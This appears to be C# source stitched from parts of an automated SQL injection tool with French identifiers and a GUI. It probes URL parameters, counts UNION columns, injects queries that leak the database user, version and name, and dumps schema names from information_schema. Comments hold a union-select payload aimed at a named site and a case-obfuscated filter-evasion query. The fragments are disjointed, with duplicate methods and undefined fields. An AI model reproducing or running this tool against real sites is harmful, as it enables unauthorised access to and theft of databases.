/*
* //EXCEPTION
* http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
*
*
*/
public void Analyse(string url)
{
form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
{
form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine;
}));
checked
{
HttpRequete hr = new HttpRequete();
sqli_check vrf = new sqli_check();
sqli_colonne colonne = new sqli_colonne();
string url_inj_point = string.Empty;
string inj_point_curr = string.Empty;
bool point_trv = false;
_url_originale = url;
_url_base = url.Split('?')[0];
_param = ch.analyseParam(url);
bool[] ok = new bool[2];
ok[0] = vrf.demmareAnalyseFast(url);
ok[1] = vrf.demmareAnalyseAvanced(url);
if (ok[0] || ok[1])
{
int u = 0; //Union Style 1
while (!point_trv && u < _union.Count)
{
_nbr_colonne = colonne.Compter(_param, _url_base, _union[u]);
onFait((u + 1).ToString());
for (int p = 0; p < _param.Count; p++)
{
_colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);
url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);
inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));
string page = hr.get(inj_point_curr);
if (page.Contains(separateur) || page.Contains(s_separateur))
{
setResult(page, url_inj_point);
point_trv = true;
break;
}
}
u++;
}
}
else
{
form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
{
form.txt_statut_analyse.Text = "Injection char echouer :( ";
}));
}
}
}
internal void setAllBD()
{
HttpRequete hr = new HttpRequete();
int nbr = 0;
try { nbr = getNombreDB(); }
catch { }//(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/sChEmA_NaMe),0x217e21) /**/fRoM information_schema./**/sChEmAtA /**/wHeRe not /**/sChEmA_NaMe=0x696e666f726d6174696f6e5f736368656d61)
string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(schema_name)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")";
string url_f = _url_point.Replace(var_n, ch.Encode(inj));
string page = hr.get(url_f);
string dbbrut = ch.extResult(separateur, page);
if (dbbrut != string.Empty)
{
if (nbr > 1)
{
string[] basededonnes = dbbrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
foreach (string bd in basededonnes)
{
if (!string.IsNullOrEmpty(bd))
{
string bd_name = ch.regexHtmlScape(bd);
TreeNode treeBD = new TreeNode(bd_name);
form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
{
form_principale.tree_schema_dmp.BeginUpdate();
form_principale.tree_schema_dmp.Nodes.Add(treeBD);
form_principale.tree_schema_dmp.EndUpdate();
}));
}
}
}
else
{
TreeNode treeBD = new TreeNode(dbbrut);
form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
{
form_principale.tree_schema_dmp.Nodes.Add(treeBD);
}));
}
}
}
public int Compter(List <string> param, string url_base, string union)
{
checked
{
HttpRequete hr = new HttpRequete();
for (int p = 0; p < param.Count; p++)
{
for (int i = 0; i <= 60; i++)
{
string url_curr = url_base +
ch.ViderDernierParam(ch.genParamParIndex(param, 0, (p + 1))) +
ch.Encode(union.Replace(var_n, GenSynHex(i))) +
ch.genParamParIndex(param, p + 1, param.Count);
string page = hr.get(url_curr);
if (page.Contains(syntax_count))
{
return(i);
}
}
}
return(0);
}
}
public string Analyse(string url)
{
checked
{
HttpRequete hr = new HttpRequete();
sqli_check vrf = new sqli_check();
sqli_colonne colonne = new sqli_colonne();
string url_inj_point = string.Empty;
string inj_point_curr = string.Empty;
bool point_trv = false;
_url_originale = url;
_url_base = url.Split('?')[0];
_param = ch.analyseParam(url);
int u = 0; //Union Style 1
while (!point_trv && u < _unionStyle.Count)
{
_nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]);
for (int p = 0; p < _param.Count; p++)
{
_colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);
url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);
inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));
string page = hr.get(inj_point_curr);
if (page.Contains(separateur) || page.Contains(s_separateur))
{
return(url_inj_point);
}
}
u++;
}
return("False");
}
}
public bool demmareAnalyseAvanced(string url)
{
checked
{
string url_racine = url.Split('?')[0];
HttpRequete hr = new HttpRequete();
chaine ch = new chaine();
_param = ch.analyseParam(url);
string param_curr = baseI.Replace(var_n, baseF.Replace(var_n, ch.getHex(separateur) + "," + ch.getHex(testSTR) + "," + ch.getHex(separateur)));
for (int i = 0; i < _param.Count; i++)
{
string url_c = url_racine + ch.ViderDernierParam(ch.genParamParIndex(_param, 0, i + 1)) + ch.Encode(param_curr) + ch.genParamParIndex(_param, i + 1, _param.Count);
string page = hr.get(url_c);
if (verifPageAdvenced(page))
{
return(true);
}
}
return(false);
}
}
